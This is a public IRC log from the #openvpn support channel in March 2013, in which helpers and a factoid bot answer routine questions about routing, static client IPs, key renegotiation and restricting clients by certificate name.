[tomte@stuck.in.the.basement.at.fritzl.nu] has quit [Ping timeout: 255 seconds] 23:27 -!- xbanux [~xbanux@triband-mum-59.182.131.207.mtnl.net.in] has quit [Ping timeout: 255 seconds] 23:27 -!- kisom_ [~kisom@c-75dce155.648-1-64736c11.cust.bredbandsbolaget.se] has quit [Ping timeout: 255 seconds] 23:27 -!- uuuppz_ [uuuppz@78.129.207.46] has quit [Ping timeout: 255 seconds] 23:27 -!- xbanux [~xbanux@triband-mum-59.182.131.207.mtnl.net.in] has joined #openvpn 23:30 -!- uuuppz [uuuppz@78.129.207.46] has joined #openvpn 23:33 -!- MFSOT [~garret@c-24-34-166-26.hsd1.ma.comcast.net] has joined #openvpn 23:34 -!- xbanux [~xbanux@triband-mum-59.182.131.207.mtnl.net.in] has quit [Read error: Connection reset by peer] 23:34 -!- xbanux [~xbanux@triband-mum-59.182.131.220.mtnl.net.in] has joined #openvpn 23:37 -!- Matir_ [~matir@ubuntu/member/matir] has joined #openvpn 23:37 -!- takatuka [~takatuka2@85.105.115.238] has quit [Ping timeout: 264 seconds] 23:41 -!- gardar_ [~gardar@gardar.net] has joined #openvpn 23:43 -!- Matir [~matir@ubuntu/member/matir] has quit [Ping timeout: 245 seconds] 23:43 -!- gardar [~gardar@gardar.net] has quit [Ping timeout: 245 seconds] 23:43 -!- Devastator [~devas@177.18.198.56] has quit [Changing host] 23:43 -!- Devastator [~devas@unaffiliated/devastator] has joined #openvpn 23:43 -!- takatuka [~takatuka2@85.105.115.238] has joined #openvpn 23:43 -!- takatuka [~takatuka2@85.105.115.238] has quit [Client Quit] 23:44 -!- MFSOT [~garret@c-24-34-166-26.hsd1.ma.comcast.net] has quit [Ping timeout: 248 seconds] 23:47 -!- l1t [~l1t@cpe-70-112-112-239.austin.res.rr.com] has quit [Read error: Operation timed out] 23:48 -!- JPeterson [~JPeterson@s213-103-210-215.cust.tele2.se] has joined #openvpn 23:50 -!- pcdummy_ [~quassel@mx1.page4me.ch] has joined #openvpn 23:52 -!- JStoker [jstoker@unaffiliated/jstoker] has quit [Ping timeout: 255 seconds] 23:52 -!- pcdummy [~quassel@unaffiliated/pcdummy] has quit [Ping timeout: 255 seconds] 23:52 -!- [1]JPeterson [~JPeterson@s213-103-210-215.cust.tele2.se] has quit [Ping timeout: 255 seconds] 23:52 -!- ChauffeR [squirrel@has.a.fluffy.redtail.it] has quit [Ping timeout: 255 seconds] 23:52 -!- Netsplit *.net <-> *.split quits: troyt, lickalott, wykydtro-, HectorBarbossa, Cybertinus 23:52 -!- ChauffeR [squirrel@has.a.fluffy.redtail.it] has joined #openvpn 23:55 <+pekster> !interface 23:55 <@vpnHelper> "interface" is (#1) paste interface configuration from both client and server, while being disconnected and when beeing connected. Be sure to also add the routing tables for both situations from client and from server or (#2) in windows: ipconfig /all - unix: ifconfig -a , and for routing tables: netstat -rn 23:56 <+pekster> !forget interface 2 23:56 <@vpnHelper> Joo got it. 23:56 <+pekster> !learn interface as For Windows: iface: 'ipconfig /all' routing: 'route print' (add -4 or -6 for just IPv4 or v6) 23:56 <@vpnHelper> Joo got it. 23:56 <+pekster> !learn interface as For Unix: iface: 'ifconfig -a' routing: 'netstat -rn' 23:56 <@vpnHelper> Joo got it. 23:56 -!- Netsplit over, joins: Cybertinus, wykydtro-, HectorBarbossa, troyt, lickalott 23:56 <+pekster> !learn interface as For Linux: iface: 'ip a s' routing: 'ip r' (use ip -6 for IPv6 routes) 23:56 <@vpnHelper> Joo got it. 23:57 <+pekster> !interface 23:57 <@vpnHelper> "interface" is (#1) paste interface configuration from both client and server, while being disconnected and when beeing connected. Be sure to also add the routing tables for both situations from client and from server or (#2) For Windows: iface: 'ipconfig /all' routing: 'route print' (add -4 or -6 for just IPv4 or v6) or (#3) For Unix: iface: 'ifconfig -a' routing: 'netstat -rn' or (#4) For Linux: 23:57 <@vpnHelper> iface: 'ip a s' routing: 'ip r' (use ip -6 for IPv6 routes) 23:58 -!- krzee [nobody@hemp.ircpimps.org] has joined #openvpn 23:58 -!- krzee [nobody@hemp.ircpimps.org] has quit [Changing host] 23:58 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 23:58 -!- mode/#openvpn [+o krzee] by ChanServ 23:58 <+pekster> !forget interface 4 23:58 <@vpnHelper> Joo got it. 23:58 <+pekster> !learn interface as For Linux: iface: 'ip a' routing: 'ip r' (use ip -6 for IPv6 routes) 23:58 <@vpnHelper> Joo got it. 23:59 <+pekster> That should clean up v4/v6 and OS-centric weirdness in those outputs --- Day changed Sun Mar 03 2013 00:01 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Read error: Connection reset by peer] 00:02 -!- JStoker [jstoker@unaffiliated/jstoker] has joined #openvpn 00:03 -!- JStoker [jstoker@unaffiliated/jstoker] has quit [Excess Flood] 00:05 -!- JStoker [jstoker@unaffiliated/jstoker] has joined #openvpn 00:07 -!- mode/#openvpn [-v pekster] by ChanServ 00:10 -!- xbanux [~xbanux@triband-mum-59.182.131.220.mtnl.net.in] has quit [Read error: Connection reset by peer] 00:10 -!- xbanux [~xbanux@triband-mum-59.182.183.81.mtnl.net.in] has joined #openvpn 00:17 -!- xbanux [~xbanux@triband-mum-59.182.183.81.mtnl.net.in] has quit [Read error: Connection reset by peer] 00:18 -!- xbanux [~xbanux@triband-mum-59.182.129.185.mtnl.net.in] has joined #openvpn 00:21 -!- krzee [nobody@hemp.ircpimps.org] has joined #openvpn 00:21 -!- krzee [nobody@hemp.ircpimps.org] has quit [Changing host] 00:21 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 00:21 -!- mode/#openvpn [+o krzee] by ChanServ 00:23 -!- necron [~voidnecro@freebsd.xs4all.nl] has joined #openvpn 00:23 -!- necron [~voidnecro@freebsd.xs4all.nl] has quit [Changing host] 00:23 -!- necron [~voidnecro@unaffiliated/necron] has joined #openvpn 00:24 -!- voidnecron [~voidnecro@unaffiliated/necron] has quit [Ping timeout: 245 seconds] 00:25 -!- xbanux [~xbanux@triband-mum-59.182.129.185.mtnl.net.in] has quit [Read error: Connection reset by peer] 00:25 -!- xbanux [~xbanux@triband-mum-59.182.137.114.mtnl.net.in] has joined #openvpn 00:27 -!- md_5 [~md_5@mcdevs/trusted/md-5] has quit [Quit: ZNC - http://znc.in] 00:27 -!- md_5 [md_5@mcdevs/trusted/md-5] has joined #openvpn 01:25 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 01:41 -!- daemoen [~daemoen@216.245.201.138] has quit [Ping timeout: 248 seconds] 01:43 -!- daemoen [~daemoen@216.245.201.138] has joined #openvpn 02:13 -!- fluter [~fluter@fedora/fluter] has joined #openvpn 02:34 -!- xbanux [~xbanux@triband-mum-59.182.137.114.mtnl.net.in] has quit [Read error: Connection reset by peer] 02:34 -!- xbanux [~xbanux@triband-mum-59.182.140.252.mtnl.net.in] has joined #openvpn 02:38 -!- xbanux [~xbanux@triband-mum-59.182.140.252.mtnl.net.in] has quit [Read error: Connection reset by peer] 02:39 -!- xbanux [~xbanux@triband-mum-59.182.146.222.mtnl.net.in] has joined #openvpn 02:39 -!- dli_ [~dli@69.172.86.211] has quit [Ping timeout: 252 seconds] 02:43 -!- dli_ [~dli@dsl-69-172-86-211.acanac.net] has joined #openvpn 02:45 -!- xbanux [~xbanux@triband-mum-59.182.146.222.mtnl.net.in] has quit [Read error: Connection reset by peer] 02:46 -!- xbanux [~xbanux@triband-mum-59.182.156.143.mtnl.net.in] has joined #openvpn 02:57 -!- alcuadrado [~alcuadrad@unaffiliated/alcuadrado] has joined #openvpn 02:58 < alcuadrado> !welcome 02:58 <@vpnHelper> "welcome" is (#1) Start by stating your goal, such as 'I would like to access the internet over my vpn' || new to IRC? see the link in !ask || we may need !logs and !configs and maybe !interface to help you. || See !howto for beginners. || See !route for lans behind openvpn. || !redirect for sending inet traffic through the server. || Also interesting: !man !/30 !topology !iporder !sample !forum 02:58 <@vpnHelper> !wiki !mitm or (#2) Don't use 192.168.1.0/24 or 192.168.0.0/24 (too much potential for conflict) 02:58 < alcuadrado> !goal 02:58 <@vpnHelper> "goal" is Please clearly state your goal for your vpn: example, I would like to access the lan behind the server , I would like to access the internet over my vpn , I just want a secure connection between 2 computers , etc 03:06 -!- latenite [~latenite@138.77.120.247] has quit [Ping timeout: 256 seconds] 03:15 -!- pinion [~pinion@unaffiliated/pinion] has quit [Ping timeout: 248 seconds] 03:15 -!- pinion [~pinion@unaffiliated/pinion] has joined #openvpn 03:30 -!- fluter [~fluter@fedora/fluter] has quit [Quit: Leaving] 03:36 -!- alcuadrado [~alcuadrad@unaffiliated/alcuadrado] has quit [Remote host closed the connection] 03:50 <+EugeneKay> !redirect 03:50 <@vpnHelper> "redirect" is (#1) to make all inet traffic flow through the vpn, you will need --redirect-gateway (see !def1), as well as IP forwarding (see !ipforward) and NAT (see !nat) enabled on the server. or (#2) you may need to use a different dns server when redirecting gateway, see !dns or !pushdns or (#3) if using ipv6 try: route-ipv6 2000::/3 or (#4) Handy troubleshooting flowchart: 03:50 <@vpnHelper> http://ircpimps.org/redirect.png 03:55 -!- oyugik [~oyugik@197.237.84.62] has joined #openvpn 03:56 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has joined #openvpn 03:56 < oyugik> Hi guys is there a way I can connect to home network via openvpn 03:57 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has quit [Client Quit] 03:58 <+EugeneKay> oyugik - yup. This is a use case covered in the howto. 04:01 < oyugik> do I get tht from the website 04:02 < oyugik> my sccenario is we have a corporate office network 04:03 < oyugik> I want to be able to use an back up application to ensure that I am able to login globally and get my files no matter where I am 04:03 <+EugeneKay> !howto 04:03 <@vpnHelper> "howto" is (#1) OpenVPN comes with a great howto, http://openvpn.net/howto PLEASE READ IT! or (#2) http://www.secure-computing.net/openvpn/howto.php for a mirror 04:12 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn 04:14 < oyugik> thanks guys 04:23 <@novaflash> just FYI for all you guys; cloudflare DNS has suffered a major fail, many sites on the internet are unreachable at the moment, and it's being fixed by cloudflare. openvpn.net and privatetunnel.com are affected by this as well. so far it looks like in most parts of the world it's working again. some areas may need to get their dns servers updated again before it'll all work. 04:28 -!- vpnHelper [~vpnHelper@openvpn/bot/vpnHelper] has quit [Read error: Connection reset by peer] 04:29 -!- vpnHelper [~vpnHelper@openvpn/bot/vpnHelper] has joined #openvpn 04:29 -!- mode/#openvpn [+o vpnHelper] by ChanServ 04:31 -!- Guest94901 [~d@64.111.123.163] has quit [Read error: Connection reset by peer] 04:31 -!- catsup [~d@64.111.123.163] has joined #openvpn 04:34 -!- oyugik [~oyugik@197.237.84.62] has quit [Ping timeout: 248 seconds] 04:44 -!- Teck7 [~teck7@bas1-montreal54-1167955052.dsl.bell.ca] has quit [Read error: Connection reset by peer] 04:49 -!- oyugik [~oyugik@197.237.84.62] has joined #openvpn 05:01 -!- JSharpe [~JSharpe@185.2.137.212] has joined #openvpn 05:17 -!- xbanux [~xbanux@triband-mum-59.182.156.143.mtnl.net.in] has quit [Ping timeout: 246 seconds] 05:22 -!- krphop [~krphop@watch.out.the.feds.are.rightbehind.us] has quit [Ping timeout: 272 seconds] 05:25 -!- oyugik [~oyugik@197.237.84.62] has left #openvpn [] 05:25 -!- krphop [~krphop@watch.out.the.feds.are.rightbehind.us] has joined #openvpn 05:27 -!- smerz [~smerz@a177088.upc-a.chello.nl] has joined #openvpn 05:40 -!- JSharpe [~JSharpe@185.2.137.212] has quit [Quit: Leaving] 06:17 -!- JSharpe [~JSharpe@46.23.64.90] has joined #openvpn 06:40 -!- MFSOT [~garret@c-24-34-166-26.hsd1.ma.comcast.net] has joined #openvpn 06:41 -!- newbie|2 [~tjz@bb219-74-43-126.singnet.com.sg] has joined #openvpn 06:43 -!- tjz [~tjz@unaffiliated/tjz] has quit [Ping timeout: 252 seconds] 06:46 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 248 seconds] 06:53 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 06:53 -!- MFSOT [~garret@c-24-34-166-26.hsd1.ma.comcast.net] has quit [Ping timeout: 248 seconds] 06:54 -!- fluter [~fluter@fedora/fluter] has joined #openvpn 06:55 -!- fluter [~fluter@fedora/fluter] has quit [Max SendQ exceeded] 06:57 -!- fluter [~fluter@fedora/fluter] has joined #openvpn 07:05 -!- l1t [~l1t@cpe-70-112-112-239.austin.res.rr.com] has joined #openvpn 07:16 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has joined #openvpn 07:37 -!- knobo` [~bohmer@174.16.9.46.customer.cdi.no] has joined #openvpn 07:37 < knobo`> Can I make openvpn update /etc/hosts? 07:41 -!- Eryn_1983_FL [~Eryn_1983@142.196.88.205] has joined #openvpn 07:47 -!- Eagleman [~Eagleman@vpn.eagleman.net] has joined #openvpn 07:47 <+EugeneKay> Sure. 07:47 <+EugeneKay> !script 07:47 <@vpnHelper> "script" is see http://openvpn.net/index.php/open-source/documentation/manuals/69-openvpn-21.html#lbAR for a list of places scripts can hook into openvpn 07:47 < Eryn_1983_FL> hey peeps 07:47 <+EugeneKay> It would be better to have it do a DDNS update tho - editing /etc/hosts is fragile; DNS was invented to make those problems go away 07:47 < Eryn_1983_FL> can you guys help me out with dd-wrt openvpn and hidemyass.com ? 07:48 < knobo`> good idea 07:48 <+EugeneKay> !provider 07:48 <@vpnHelper> "provider" is (#1) We are not your provider's free tech support. We support the free open source app OpenVPN, not your provider. Just because they run openvpn does not mean we are their support team. or (#2) Please contact their support team. 07:48 <+EugeneKay> Our ability to help is limited if you don't control the server 07:48 < Eryn_1983_FL> i went through both their how tos and i am stumped 07:48 < knobo`> ipp.txt shows a different IP then the client actually got.. 07:48 < knobo`> ifconfig-pool-persist ipp.txt 07:49 <+EugeneKay> !ipp 07:49 <@vpnHelper> "ipp" is (#1) the option --ifconfig-pool-persist ipp.txt does NOT create static ips or (#2) Note that the entries in this file are treated by OpenVPN as suggestions only, based on past associations between a common name and IP address. They do not guarantee that the given common name will always receive the given IP address. If you want guaranteed assignment, see !iporder and !static 07:49 < knobo`> thanx 07:52 -!- Eagleman7 [~Eagleman@vpn.eagleman.net] has joined #openvpn 07:52 -!- Mcloven_ [~Mcloven@ppp203-122-218-215.static.internode.on.net] has joined #openvpn 07:54 < knobo`> !iporder 07:54 <@vpnHelper> "iporder" is (#1) OpenVPN's internal client IP address selection algorithm works as follows: 1 -- Use --client-connect script generated file for static IP (first choice). or (#2) Use --client-config-dir file for static IP (next choice) !static for more info or (#3) Use --ifconfig-pool allocation for dynamic IP (last choice) or (#4) if you use --ifconfig-pool-persist see !ipp 07:54 -!- pinion_ [~pinion@unaffiliated/pinion] has joined #openvpn 07:54 -!- rooth [tomte@stuck.in.the.basement.at.fritzl.nu] has joined #openvpn 07:54 -!- Orbi [~opera@109.129.18.23] has joined #openvpn 07:56 -!- kisom_ [~kisom@c-75dce155.648-1-64736c11.cust.bredbandsbolaget.se] has joined #openvpn 07:59 -!- knobo` [~bohmer@174.16.9.46.customer.cdi.no] has quit [Ping timeout: 240 seconds] 08:00 -!- jave_ [~jave@h-235-102.a149.priv.bahnhof.se] has joined #openvpn 08:00 -!- Thermi [~Thermi@HSI-KBW-078-043-018-016.hsi4.kabel-badenwuerttemberg.de] has quit [Ping timeout: 260 seconds] 08:01 -!- Netsplit *.net <-> *.split quits: vistas, Eagleman, smerz, pinion, jgeboski, Mcloven, ChauffeR, rooth_, kisom, jave 08:02 -!- Netsplit over, joins: jgeboski 08:02 -!- Netsplit over, joins: vistas 08:03 -!- Thermi [~Thermi@HSI-KBW-078-043-018-016.hsi4.kabel-badenwuerttemberg.de] has joined #openvpn 08:04 -!- Eryn_1983_FL [~Eryn_1983@142.196.88.205] has quit [Read error: Connection reset by peer] 08:05 -!- Eryn_1983_FL [~Eryn_1983@142.196.88.205] has joined #openvpn 08:07 -!- ChauffeR [squirrel@has.a.fluffy.redtail.it] has joined #openvpn 08:08 -!- smerz [~smerz@a177088.upc-a.chello.nl] has joined #openvpn 08:12 -!- kisom_ is now known as kisom 08:13 -!- Eryn_1983_FL [~Eryn_1983@142.196.88.205] has quit [Ping timeout: 255 seconds] 08:25 -!- Orbi [~opera@109.129.18.23] has left #openvpn [] 08:25 -!- Orbi [~opera@109.129.18.23] has joined #openvpn 08:29 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 08:32 -!- smerz [~smerz@a177088.upc-a.chello.nl] has quit [Read error: Operation timed out] 08:40 -!- Eryn_1983_FL [~Eryn_1983@142.196.88.205] has joined #openvpn 08:50 -!- pequalsnp [~alexander@f054186078.adsl.alicedsl.de] has joined #openvpn 08:51 < pequalsnp> hi, I have a freebsd gateway with dhcpd set up, now I want to the openvpn client on this gateway and route all dhcp client traffic over openvpn? How do I proceed? 08:51 -!- BasicXP [~basicxp@ubuntu/member/BasicXP] has joined #openvpn 08:52 -!- Orbi [~opera@109.129.18.23] has left #openvpn [] 08:52 -!- Orbi [~opera@109.129.18.23] has joined #openvpn 08:58 -!- fluter [~fluter@fedora/fluter] has quit [Remote host closed the connection] 09:01 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn 09:32 -!- TommehM [~TomM@unaffiliated/tommehm] has quit [Excess Flood] 09:37 -!- Eryn_1983_FL [~Eryn_1983@142.196.88.205] has left #openvpn ["WeeChat 0.3.2"] 09:41 <+EugeneKay> openvpn prefers to hand out its own addresses 09:41 <+EugeneKay> You can do a bridged seup and dhcp, but such things tend to have bad performance 09:44 -!- TommehM [~TomM@unaffiliated/tommehm] has joined #openvpn 09:45 < pequalsnp> EugeneKay: I would like to route over tun. Is this a bad idea? 09:45 <+EugeneKay> pequalsnp - routing is the only thing you can do over tun 09:45 <+EugeneKay> When doing routing(the recommended openvpn method) you have to use openvpn's internal addressing 09:46 <+EugeneKay> If your desire for DHCPd is for rDNS records or such, use an --up script 09:47 < pequalsnp> EugeneKay: what do you mean by internal addressing? 09:47 <+EugeneKay> The way openvpn hands out addresses 09:47 -!- novaflash is now known as novaflash_away 09:48 -!- novaflash_away is now known as novaflash 09:49 < pequalsnp> But I only need the address for the freebsd box, right? 09:50 <+EugeneKay> I'm speaking about the addresses used on the vpn 09:53 < pequalsnp> EugeneKay: I'm not sure I understand. does this concern nat? 09:53 <+EugeneKay> In the sense that it's networking 09:53 <+EugeneKay> What are you trying to do? 09:56 < pequalsnp> EugeneKay: I have a router connected directly to the internet. to this router I want to connect the freebsd box as a gateway which should route all traffic over openvpn. 09:56 <+EugeneKay> Ah 09:56 <+EugeneKay> !redirect 09:56 <@vpnHelper> "redirect" is (#1) to make all inet traffic flow through the vpn, you will need --redirect-gateway (see !def1), as well as IP forwarding (see !ipforward) and NAT (see !nat) enabled on the server. or (#2) you may need to use a different dns server when redirecting gateway, see !dns or !pushdns or (#3) if using ipv6 try: route-ipv6 2000::/3 or (#4) Handy troubleshooting flowchart: 09:56 <+EugeneKay> !route 09:56 <@vpnHelper> http://ircpimps.org/redirect.png 09:56 <@vpnHelper> "route" is (#1) http://www.secure-computing.net/wiki/index.php/OpenVPN/Routing or https://community.openvpn.net/openvpn/wiki/RoutedLans (same page mirrored) if you have lans behind openvpn, read it DONT SKIM IT or (#2) READ IT DONT SKIM IT! or (#3) See !tcpip for more info about a more basic networking guide or (#4) See !serverlan or !clientlan for steps and troubleshooting flowcharts for LANs 09:56 <@vpnHelper> behind the server or client 10:00 -!- marksaitis [~marksaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has joined #openvpn 10:01 < pequalsnp> EugeneKay: nice! :) I have some reading to do... thank you! 10:03 -!- xtz [xtz@DeathStar.Techn0.eu] has joined #openvpn 10:29 -!- pequalsnp [~alexander@f054186078.adsl.alicedsl.de] has quit [Ping timeout: 260 seconds] 10:43 -!- Visitorer [~Visitorer@unaffiliated/visitorer] has quit [Quit: Client has a boner *rimshot* Get it?] 10:48 -!- xbanux [~xbanux@triband-mum-59.182.152.159.mtnl.net.in] has joined #openvpn 10:55 -!- raidz_away [~raidz@openvpn/corp/admin/andrew] has quit [Ping timeout: 248 seconds] 11:01 -!- raidz_away [~raidz@raidz.im] has joined #openvpn 11:01 -!- raidz_away is now known as raidz 11:01 -!- raidz [~raidz@raidz.im] has quit [Changing host] 11:01 -!- raidz [~raidz@openvpn/corp/admin/andrew] has joined #openvpn 11:01 -!- mode/#openvpn [+o raidz] by ChanServ 11:15 -!- smerz [~smerz@a177088.upc-a.chello.nl] has joined #openvpn 11:15 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Read error: Connection reset by peer] 11:17 -!- alcuadrado [~alcuadrad@unaffiliated/alcuadrado] has joined #openvpn 11:23 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 11:23 -!- mode/#openvpn [+o krzee] by ChanServ 11:36 < alcuadrado> !welcome 11:36 <@vpnHelper> "welcome" is (#1) Start by stating your goal, such as 'I would like to access the internet over my vpn' || new to IRC? see the link in !ask || we may need !logs and !configs and maybe !interface to help you. || See !howto for beginners. || See !route for lans behind openvpn. || !redirect for sending inet traffic through the server. || Also interesting: !man !/30 !topology !iporder !sample !forum 11:36 <@vpnHelper> !wiki !mitm or (#2) Don't use 192.168.1.0/24 or 192.168.0.0/24 (too much potential for conflict) 11:36 < alcuadrado> !logs 11:36 <@vpnHelper> "logs" is (#1) is please pastebin your logfiles from both client and server with verb set to 5 or (#2) In the Windows client(OpenVPN-GUI) right-click the status icon and pick View Log or (#3) In the OS X client(Tunnelblick) right-click it nd select Copy log text to clipboard or (#4) if you dont know how to find your logs, see !logfile 11:36 < alcuadrado> !configs 11:36 <@vpnHelper> "configs" is (#1) please pastebin your client and server configs (with comments removed, you can use `grep -vE '^#|^;|^$' server.conf`), also include which OS and version of openvpn. or (#2) dont forget to include any ccd entries or (#3) on pfSense, see http://www.secure-computing.net/wiki/index.php/OpenVPN/pfSense to obtain your config 11:57 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn 12:20 -!- master_o1_master [~master_of@p4FF242D5.dip.t-dialin.net] has quit [Ping timeout: 246 seconds] 12:22 -!- master_of_master [~master_of@p4FF2449F.dip.t-dialin.net] has joined #openvpn 12:39 -!- knobo` [~bohmer@174.16.9.46.customer.cdi.no] has joined #openvpn 12:46 -!- ar0nic [~no@c-174-56-147-242.hsd1.sc.comcast.net] has quit [Ping timeout: 256 seconds] 12:55 -!- madsage [sage@2001:470:c:1292::2] has joined #openvpn 12:55 < madsage> greets 12:56 < madsage> hey is there a way to adjust the expiry time of keys? i'm guessing that is not recomended. but just currious 12:58 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Ping timeout: 252 seconds] 12:58 -!- xbanux [~xbanux@triband-mum-59.182.152.159.mtnl.net.in] has quit [Ping timeout: 256 seconds] 13:00 < pekster> madsage: Do you mean the symmetric encryption keys for the data channel? The public/private keys never expire, but the issued certificates have a not-valid-before and not-valid-after time 13:03 < madsage> the soft reset, TLS: tls_process: killed expiring key 13:03 < madsage> seems like it goes off avery hour? 13:03 < madsage> avery/every 13:04 < madsage> it doesnt seem interupting but fills my logs until --mute is triggered. 13:05 -!- marksaitis [~marksaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has quit [Ping timeout: 260 seconds] 13:06 < madsage> i guess i can always adjust verbosity but i like some of the other info that is provided at the same level. currently using verbostity level 4 13:06 -!- TommehM [~TomM@unaffiliated/tommehm] has quit [Ping timeout: 246 seconds] 13:07 -!- bla [bla@unaffiliated/bla] has joined #openvpn 13:07 < bla> Hellloh. 13:08 < pekster> madsage: The data channel is secured with a symmetric key (blowfish 128-bit by default, see --cipher and --keysize in the manpage) and rotates every hour by default. See the --reneg-* options to change this 13:08 < bla> I'm trying to google a way to limit access to openvpn to specific client certificate path / cn. No luck so far. Any directions? 13:09 < madsage> pekster, cool thanks man, i'll check that --reneg option out 13:10 < pekster> madsage: There are 3 varients to that, for re-keying after a period of time, bytes, or packets. The first side to hit any of the limits initiates a re-key with the peer. It is thus allowed to use --reneg-sec 0 on the client and control it strictly from the server too 13:11 < pekster> bla: See --client-connect and key off $common_name in that script. Something sh-like this might get you started: if [ "$common_name" = "Good Client" ]; then exit 0; fi; exit 1 13:11 < bla> Ah, ok, so only external script. 13:11 < bla> Thanks. 13:11 < pekster> Or revoke clients you no longer want to connect 13:12 < pekster> Optionally you can create a ccd file with the directive 'disable' in the file which disables the client 13:12 < bla> No, I have multiple openvpn servers with users split 13:12 < bla> and want only single CA 13:12 < madsage> Renegotiate data channel key after n seconds (default=3600) 13:12 < bla> client-directory? I could create files for all files and place 'disable' in DEFAULT maybe? 13:12 < madsage> nice. ok, preciate the help. 13:13 < bla> pekster, thanks, that solution rocks. 13:13 < pekster> madsage: It's good to rotate those now and then for normal operation to gain the advantages of Perfect Forward Secrecy, but you're free to increase that. On a proxy VPN tunnel I keep open for days on end, I re-key after 500M of traffic or 12h, whichever comes first 13:13 < pekster> bla: better is to use --ccd-exclusive if you're creating ccd's for allowed clients anyway 13:14 < pekster> Even better would be to create sub-CAs for your 2 VPN servers, but maybe you're trying to avoid that for some reason 13:15 < bla> I prefer simple solutions. There're not really that much clients and there's single point for delegating privilages. 13:16 < bla> Although our next CA will be possibly a bit more complicated (at least one sub CA for VPN itself.) 13:24 -!- madsage [sage@2001:470:c:1292::2] has quit [Quit: [BX] I got sucked into /dev/null!] 13:24 < knobo`> !static 13:24 <@vpnHelper> "static" is (#1) use --ifconfig-push in a ccd entry for a static ip for the vpn client or (#2) example in net30 (default): ifconfig-push 10.8.0.6 10.8.0.5 example in subnet (see !topology) or tap (see !tunortap): ifconfig-push 10.8.0.5 255.255.255.0 or (#3) also see !ccd and !iporder 13:31 -!- aaaar0n [~no@c-174-56-147-242.hsd1.sc.comcast.net] has joined #openvpn 13:31 -!- aaaar0n is now known as ar0nic 13:42 -!- digilink [~digilink@unaffiliated/digilink] has quit [Ping timeout: 272 seconds] 13:43 -!- digilink [~digilink@unaffiliated/digilink] has joined #openvpn 14:14 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 14:18 -!- Eagleman7 [~Eagleman@vpn.eagleman.net] has quit [] 14:19 < knobo`> topology subnet is probably the most intuitive(?) 14:19 < knobo`> And then I can have 243 clients on a /24 subnet, right? 14:20 < pekster> knobo`: Yup, and it's recommended unless you require support for pre-2.1 clients (ie: client versions that are 6+ years old.) 14:20 < pekster> 253 clients (256 minus 1 each for the network, "broadcast" that isn't used, and the server's IP 14:20 < knobo`> ah, right. and minus 1 for the server 14:21 < knobo`> right... 14:21 < knobo`> i wrote 243 instead of 254... 14:22 < pekster> OpenVPN is single-threaded, so you'll often run into problems actually trying to connect that many clients, depending on usage 14:39 -!- n0sq [~quassel@75-135-14-61.dhcp.krny.ne.charter.com] has joined #openvpn 14:42 < bla> pekster, are there any hardware servers cooperating with openvpn clients? 14:44 < pekster> I don't get your question 14:44 < pekster> OpenVPN uses the tun device which runs in the kernel, but otherwise operates in userland 15:10 < knobo`> How many clients is OK with low traffic? 15:11 < pekster> With low traffic? Probably a lot since it's just keepalive packets and re-keys going on 15:12 < pekster> Each client will eat a little RAM, but that shouldn't pose a problem except on embedded hardware 15:12 < knobo`> Everything is currently running with ssh tunnels. 15:13 < knobo`> Can you imagine? 15:14 < pekster> If you have multiple CPUs/cores you can just run multiple openvpn instances and load balance (either by purely random --remote-random or DNS means, or do some cute load-balancing by detecting how many clients are on a given server and send them to the lesser-utilitized one 15:16 < knobo`> good :) 15:18 < alcuadrado> Hi, I'm kind of new with openVPN, I've used it before, but now I bought a VPN service and I can't connect, and know nothing about troubleshooting it, and somehow it's not writing any log... I'm using it though networkmanager 15:18 < knobo`> Or wait for 3.0 (that was planned 3 years ago) 15:19 -!- ade_b [~Ade@redhat/adeb] has quit [Quit: Too sexy for his shirt] 15:24 < pekster> !provider 15:24 <@vpnHelper> "provider" is (#1) We are not your provider's free tech support. We support the free open source app OpenVPN, not your provider. Just because they run openvpn does not mean we are their support team. or (#2) Please contact their support team. 15:24 < pekster> !netman 15:24 <@vpnHelper> "netman" is if you are using network manager for linux to configure your vpn, dont! http://openvpn.net/archive/openvpn-users/2008-01/msg00046.html to read the same thing from the author of the openvpn 2 cookbook on the mail list 15:25 < pekster> An actual openvpn config and a log might get you further, but without access to the server config and possibly its log, it's likely hard to say why it's failing 15:29 < alcuadrado> for sure I'm not seeking free support, just a hint to learn more 15:30 < alcuadrado> so I won't use networkmanager then.. where can I read how to config it? man pages? 15:30 < pekster> Well, you've said it's not working, can't show a config file, or a log with details. My reply: "it's broken." 15:30 < pekster> !howto 15:30 <@vpnHelper> "howto" is (#1) OpenVPN comes with a great howto, http://openvpn.net/howto PLEASE READ IT! or (#2) http://www.secure-computing.net/openvpn/howto.php for a mirror 15:31 < pekster> Your config needs to match the server's end. You might try and assume defaults, but I can't really say without seeing the server end 15:31 < alcuadrado> ohh I see 15:31 < pekster> You'll need a ca.crt either way, and a client keypair if they require it 15:31 < alcuadrado> so I think first I'll try it on windows (they provide a custom installer), if it doesn't work there I think is safe to say that its blocked by the network admins 15:32 < pekster> Hopefully their "custom installer" gives you proper notice of the GPL status of openvpn and a link to the source, otherwise they're in violation of the license and need to be "encouraged" to stop violating it 15:33 < alcuadrado> let's see, I'm going to windows, brb 15:33 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [] 15:33 -!- alcuadrado [~alcuadrad@unaffiliated/alcuadrado] has quit [Quit: This conversation is over] 15:40 < knobo`> famous last words.. 